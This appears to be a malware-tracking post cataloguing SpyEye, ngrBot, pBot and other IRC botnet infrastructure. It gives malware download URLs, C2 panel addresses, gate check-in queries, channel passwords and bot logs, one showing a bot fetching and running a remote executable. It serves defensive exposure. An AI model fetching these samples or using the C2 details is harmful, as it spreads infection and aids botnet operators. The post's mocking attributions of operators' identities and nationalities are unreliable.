Spy Eye Panel: http://theimageshare.com/kurac/
Spy Eye Sample: http://89.207.135.198/pas.exe
http://adf.ly/1x8Rp (just in case the first link is removed)
Websites used to infect people:
butterflysolutions.net ??? iserdo need money ?
imageshare.cc
iserdo.net ???? lol
popusi.biz
HTTP Queries
HTTP Query Text
– 5xf9~x15x10x11x11x11x11x16x15x15x15x15x17x17x17x17x1ax1ax1ax1anx01!U4V:__-H8ty{{juuuux17xx0cS4A(LLx19jx0f}x0fN
theimageshare.com GET /kurac/gate.php?guid=User!SANDBOXB!38BA2BE7&ver=10299&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&cpu=100&ccrc=FADB319B&md5=e47f5cbd0ae6d17cbeb5530db3f9779f HTTP/1.1
Windows API Calls
PId Image Name Address Function ( Parameters ) | Return Value
privathosting.be/~ishigo/(Spy Eye Banking Trojan hosted in Viet Nam Layer 2 - customer Network Of Vtdc)
ishigo is a poor French lamer; he's known on carding boards.
Exe File: http://privathosting.be/~ishigo/ptcmd.exe
Avira fails to detect this:
File name Result
ptcmd.exe FALSE POSITIVE
The file 'ptcmd.exe' has been classified as 'FALSE POSITIVE'. This means that this file is not dangerous and that it was an erroneous report on our part. The detection pattern
HTTP malware
DNS Queries
DNS Query Text
www.agriturismoraggiodisole.com IN A +
www.agit.com.br IN A +
www.ameagaru.fr IN A +
HTTP Queries
HTTP Query Text
www.agriturismoraggiodisole.com POST /files/filtect.php HTTP/1.0
www.agit.com.br POST /apuracao/filtect.php HTTP/1.0
www.ameagaru.fr POST /memo/filtect.php HTTP/1.0
DNS Queries
DNS Query Text
www.allahskanan.net IN A +
www.groupe-cogit.com IN A +
fercon.ro IN A +
demo.ckentgroup.com IN A +
HTTP Queries
HTTP Query
sk9.no-ip.biz(USA hacker using a RAT from a home connection, United States Hamden AT&T Internet Services)
This guy is a hacker from the United States of America.
sk9.no-ip.biz DNS_TYPE_A 76.231.162.14 YES
TCP Connection Attempts: 76.231.162.14:3086
EXE Files:
http://armoredfist01.fileave.com/manycam.exe
http://armoredfist01.fileave.com/
hosting infos: http://whois.domaintools.com/76.231.162.14
toqak.cjb.net(Albanian hacker scanning for VNC, bot hosted in Russian Federation Moscow Ojsc Vimpelcom)
Remote Host Port Number
195.239.22.110 4244
NICK [nLh-VNC]phrkbv
USER wjkfr "fo3.net" "rage" :wjkfr
JOIN #v# sk
PRIVMSG #v# : [RAGE SCAN:] range: 89.x.x.x/90 threads.
hosting infos: http://whois.domaintools.com/195.239.22.110
91.211.117.152(ngrBot from fubar and jam3s hosted in Ukraine Zharkov Mukola Mukolayovuch)
Remote Host Port Number
213.251.170.52 80
91.211.117.152 1865
PASS ngrBot
NICK n{US|XPa}tqmvmrd
USER tqmvmrd 0 0 :tqmvmrd
JOIN #main 4m3r1k4
JOIN #clean
QUIT :removing
hosting infos: http://whois.domaintools.com/91.211.117.152
92.241.164.155(ngrBot hosted in Russian Federation Oao Webalta)
Remote Host Port Number
174.132.149.187 80
208.79.237.100 80
213.251.170.52 80
92.241.164.155 7654
PASS ngrBot
NICK n{US|XPa}sxwscly
USER sxwscly 0 0 :sxwscly
JOIN #oldgold noKIDs
PRIVMSG #oldgold :[d="http://buenosairesrestaurante.com/js/jquery/plugins/supefish.js.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Wcxaxw.exe" - Download retries: 0
PRIVMSG #oldgold :[DNS]: Blocked 0 domain(s) - Redirected 31 domain(s)
hosting infos: http://whois.domaintools.com/92.241.164.155
27-225-115-208.reverse.lstn.net(600 linux bots hosted in United States Limestone Networks Inc)
class pBot {
    // IRC C2 settings as found in the hosted pBot source
    var $config = array(
        "server"   => "208.115.225.27",
        "port"     => "2390",
        "pass"     => "",
        "prefix"   => "BoT",
        "maxrand"  => "3",
        "chan"     => "#dada",
        "chan2"    => "#dada",
        "key"      => "123456",
        "modes"    => "+p",
        "password" => "123",
        "trigger"  => ".",
        "hostauth" => "*" // * for any hostname (remember: /setvhost xdevil.org)
    );
}
Clients: I have 162 clients and 0 servers
Local users: Current Local Users: 162 Max: 585
Global users: Current Global Users: 162 Max: 477
Joins: [A]BoT824 12[ 15BoT545@rox-E8B5EA1.xrea.com]
ircb.iranserv.com(irc botnet hosted in Belgium Brussels Telenet N.v)
Finally, the first Belgian hacker from Iran.
Remote Host Port Number
212.123.29.57 8080
NICK IC79467772
USER root 8 * : some name
PONG :E1B2C2E5
JOIN #iseee
PRIVMSG #iseee :&userid=COMPUTERNAME
PONG :ircb.iranserv.com
Telenet claims to be one of the best ISPs in Belgium, and this botnet is hosted in the Telenet network.
This is even funnier:
remarks: trouble:
213.58.198.106(irc botnet hosted in Portugal Lisbon Onitelecom – Infocomunicacoes S.a)
Remote Host Port Number
213.58.198.106 7107
NICK new[iRooT-XP-USA]694514
USER 4318 "" "TsGh" :4318
JOIN #!MSN! Coded
PONG :irc.foonet.com
NICK new[iRooT-XP-USA]389985
MODE #!Reklam!
PRIVMSG #!Reklam! : OnLine...
NICK DeliCocuk
USER bruce "mIRC" "kayits.byinter.net" :KendiniBilmeZ
JOIN #!Reklam! sikimiye
MODE DeliCocuk +i
USER 4207 "" "TsGh" :4207
JOIN #!MSN! Coded
PRIVMSG #!MSN! :[Download]: Executed Successfully
NICK anil
USER